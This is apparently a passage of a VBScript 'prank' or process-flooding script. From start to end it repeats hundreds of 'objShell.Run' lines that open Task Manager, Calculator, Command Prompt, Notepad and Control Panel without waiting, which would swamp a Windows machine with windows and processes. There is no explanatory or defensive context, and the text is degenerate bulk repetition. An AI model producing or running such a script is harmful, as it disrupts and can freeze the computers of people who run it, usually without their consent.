objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

